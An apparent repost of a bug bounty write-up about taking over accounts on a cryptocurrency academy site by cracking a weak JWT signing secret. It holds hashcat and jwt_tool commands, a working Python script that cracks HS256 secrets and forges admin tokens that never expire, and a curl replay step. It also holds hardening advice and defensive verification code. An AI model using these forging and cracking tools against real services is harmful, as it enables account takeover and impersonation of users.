My Journey in Bug Bounty: How I Found My First Bug (A Long Time Ago)

A while ago, I was analyzing the main website of a cryptocurrency platform within a public bug bounty scope when I found a link to an academy platform. After understanding the application and its functionalities, I discovered that authentication was done via JWT tokens. Initially, I tried cracking the secret key with Hashcat, expecting no success—but surprisingly, it worked almost instantly.

With the key in hand, I manipulated the `userId` claim (though not more generic fields like email). This allowed me to “take over” any account, access personal information (email, phone number), and even change passwords, locking out legitimate users. Additionally, I bypassed session expiration by forging infinite tokens, affecting both web and mobile versions.

You Should Know:

1. Cracking JWT Secrets with Hashcat

HMAC-signed JWTs (`alg` of HS256/HS384/HS512) are only as strong as the shared secret, and that secret is frequently a dictionary word. Because the signature can be checked offline, a weak secret can be recovered without sending a single request to the target. To test for this:

1. Save the JWT (taken from a cookie or the `Authorization` header) to a file, one token per line:

echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c' > jwt.txt

2. Prepare a wordlist (e.g., `secrets.txt`). The two entries below are only a starting point; in practice use a real password list such as rockyou or SecLists. Note that the token above is the jwt.io sample token, whose HS256 secret is `your-256-bit-secret`, so add that word if you want to see a hit on it:

echo "secret" > secrets.txt 
echo "password" >> secrets.txt 

3. Run Hashcat (mode 16500 is the JWT format; it only applies to HMAC-signed tokens, RS*/ES* tokens cannot be cracked this way):

hashcat -a 0 -m 16500 jwt.txt secrets.txt

`--force` merely suppresses driver and self-test warnings and should not be needed on a working install. A recovered secret is printed as `<token>:<secret>` and can be displayed again later with `hashcat -m 16500 jwt.txt --show`.

2. Manipulating JWT Claims

Once you have the secret, you can sign any claims you like and the server will accept them as genuine. With PyJWT (`pip install PyJWT`):

  • Python Script:
    import jwt  # PyJWT

    # Claims the server trusts because it verifies the signature, not the content:
    # a different userId impersonates another user, a far-future exp never expires.
    forged_token = jwt.encode({"userId": "admin", "exp": 9999999999}, "secret", algorithm="HS256")
    print(forged_token)  # PyJWT 2.x returns str; PyJWT 1.x returns bytes
    
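The cracking and forging steps above, as one self-contained script (added example, not code from the original write-up). It uses only the standard library, so it runs without Hashcat or PyJWT installed: `crack_hs256` performs the same HMAC-SHA256 comparison that `hashcat -m 16500` does, and `forge_hs256` signs arbitrary claims with the recovered key. The target is the sample token from the page (the jwt.io example, whose secret is `your-256-bit-secret`); the wordlist is constructed here and deliberately contains that secret so the attack succeeds offline.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# Sample token from the page (the well-known jwt.io example token).
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)

# Constructed wordlist standing in for secrets.txt; contains the real secret.
WORDLIST = ["secret", "password", "changeme", "your-256-bit-secret", "jwtsecret"]


def b64url_encode(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the '=' padding that JWT segments drop, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256(signing_input: bytes, secret: str) -> bytes:
    """HS256 signature is HMAC-SHA256 over '<header>.<payload>' keyed by the secret."""
    return hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the signature with each candidate secret
    and return the first one that reproduces the token's signature, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token: alg={header.get('alg')!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    target = b64url_decode(sig_b64)
    for secret in candidates:
        if hmac.compare_digest(hs256(signing_input, secret), target):
            return secret
    return None


def forge_hs256(claims: dict, secret: str) -> str:
    """Mint a token with attacker-chosen claims signed by the recovered secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        b64url_encode(json.dumps(header, separators=(",", ":")).encode("utf-8")),
        b64url_encode(json.dumps(claims, separators=(",", ":")).encode("utf-8")),
    ]
    signing_input = ".".join(segments).encode("ascii")
    segments.append(b64url_encode(hs256(signing_input, secret)))
    return ".".join(segments)


def decode_claims(token: str) -> dict:
    """Read the payload without verifying anything (what an attacker inspects first)."""
    return json.loads(b64url_decode(token.split(".")[1]))


if __name__ == "__main__":
    secret = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("cracked secret:", secret)
    # Impersonate another user and never expire, as described in the write-up.
    forged = forge_hs256({"userId": "admin", "exp": 9999999999}, secret)
    print("forged token:", forged)
    print("forged claims:", decode_claims(forged))
```

`crack_hs256` is the logic Hashcat parallelises on a GPU; at Python speed it is still fast enough to run a few million candidates, which is all a weak-secret check usually needs.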
    

3. Testing Token Expiry

This is an expiry-enforcement check, not session fixation: forge two tokens with the recovered secret, one with `exp` in the past and one with `exp` far in the future, and replay each against an authenticated endpoint. If the expired token is still accepted, or the far-future one is accepted without any server-side limit on lifetime, sessions cannot be ended by expiry at all:

curl -H "Authorization: Bearer <forged_token>" https://target.com/api/user

4. Mobile App Testing

The mobile app used the same JWTs, so the same forged tokens work there. To confirm, intercept mobile traffic with Burp Suite (install Burp's CA certificate on the device first; apps that pin certificates will need the pinning bypassed, e.g. with Frida):

  • Configure the proxy on Android (replace the address with your Burp listener), and clear it afterwards:
    adb shell settings put global http_proxy 192.168.1.2:8080
    adb shell settings put global http_proxy :0
    

What Undercode Say

JWT vulnerabilities are common due to weak secrets, misconfigurations, and poor validation. The claims in a token are only trustworthy if the signature is verified with a key an attacker cannot guess. Always:
– Use Strong Secrets: an HS256 key should be at least 256 bits of random data from a CSPRNG, never a word such as `secret` or `password`; or switch to an asymmetric algorithm (RS256/ES256) so the verifying side holds no signing key at all.
– Pin the Algorithm: the server decides which `alg` it accepts; never take it from the token header.
– Validate Token Expiry: require `exp`, reject anything past it, and issue short-lived tokens so a stolen or forged token has a bounded life.
– Trust Claims Only After Verification: `userId` in a token is fine, but it must never be read before the signature check passes, and changing a password should invalidate the user's existing tokens.
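The server-side counterpart to the hardening advice above, as an added example (not the platform's code): `issue_hs256` mints short-lived tokens with a CSPRNG-generated secret, and `verify_hs256` refuses anything an attacker could have influenced: a weak key, an unexpected `alg`, a bad signature, a missing or past `exp`, or a lifetime longer than the policy allows (which is exactly what an `exp` of 9999999999 looks like). The lifetime limit and the 32-byte minimum key length are assumed policy values, not requirements from the page.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

MIN_HS256_SECRET_BYTES = 32      # 256-bit minimum for HS256 (RFC 7518 section 3.2)
MAX_LIFETIME_SECONDS = 15 * 60   # assumed policy: no token may claim more than 15 minutes


def generate_secret() -> str:
    """A strong HS256 secret: random bytes from the OS CSPRNG, not a dictionary word."""
    return secrets.token_urlsafe(MIN_HS256_SECRET_BYTES)


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _require_strong_secret(secret: str) -> None:
    if len(secret.encode("utf-8")) < MIN_HS256_SECRET_BYTES:
        raise ValueError("HS256 secret shorter than 256 bits")


def issue_hs256(claims: dict, secret: str, now: Optional[int] = None,
                lifetime: int = MAX_LIFETIME_SECONDS) -> str:
    """Server-side issuance: the server, not the client, sets iat and exp."""
    _require_strong_secret(secret)
    now = int(time.time()) if now is None else now
    body = dict(claims, iat=now, exp=now + lifetime)
    header_b64 = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"},
                                           separators=(",", ":")).encode("utf-8"))
    payload_b64 = _b64url_encode(json.dumps(body, separators=(",", ":")).encode("utf-8"))
    sig = hmac.new(secret.encode("utf-8"), f"{header_b64}.{payload_b64}".encode("ascii"),
                   hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: str, now: Optional[int] = None) -> dict:
    """Return the claims only if every check passes; raise ValueError otherwise.
    Nothing from the payload is used before the signature has been verified."""
    _require_strong_secret(secret)
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # Algorithm is pinned by the server: blocks alg=none and HS/RS key-confusion tricks.
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret.encode("utf-8"), f"{header_b64}.{payload_b64}".encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    exp, iat = claims.get("exp"), claims.get("iat")
    if not isinstance(exp, int) or not isinstance(iat, int):
        raise ValueError("exp and iat are required")
    if now >= exp:
        raise ValueError("token expired")
    if exp - iat > MAX_LIFETIME_SECONDS:
        raise ValueError("token lifetime too long")   # rejects forged 'exp': 9999999999
    return claims


def rejection_reason(token: str, secret: str, now: Optional[int] = None) -> Optional[str]:
    """Convenience wrapper: None if the token is accepted, else the reason it was refused."""
    try:
        verify_hs256(token, secret, now)
        return None
    except ValueError as err:
        return str(err)


if __name__ == "__main__":
    key = generate_secret()
    t0 = 1_700_000_000                      # fixed clock so the demo is reproducible
    token = issue_hs256({"userId": "42"}, key, now=t0)
    print("fresh token accepted:", rejection_reason(token, key, now=t0 + 60))
    print("after expiry:", rejection_reason(token, key, now=t0 + MAX_LIFETIME_SECONDS + 1))
    print("wrong key:", rejection_reason(token, generate_secret(), now=t0 + 60))
    print("weak key refused outright:", rejection_reason(token, "secret", now=t0 + 60))
```

Rejecting a short secret at verification time is deliberate: it turns a deployment mistake into an immediate, loud failure instead of a silent weakness that only an attacker with Hashcat discovers.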

To test an application for these weaknesses in one pass, jwt_tool covers weak-secret cracking as well as the other common JWT mistakes (algorithm confusion, `alg: none`, claim tampering):

git clone https://github.com/ticarpi/jwt_tool 
cd jwt_tool 
python3 jwt_tool.py <JWT_TOKEN> -C -d secrets.txt 

Expected Output:

`-C` runs the crack against the dictionary given with `-d`; jwt_tool reports whether any word reproduces the signature and prints the matching secret when it finds one. Without `-C` it decodes the header and payload so you can see which claims (such as `userId`) would be worth tampering with.

Note: Always test responsibly and within legal bounds.

References:

Reported By: Davidkarpinski01 Bbp – Hackers Feeds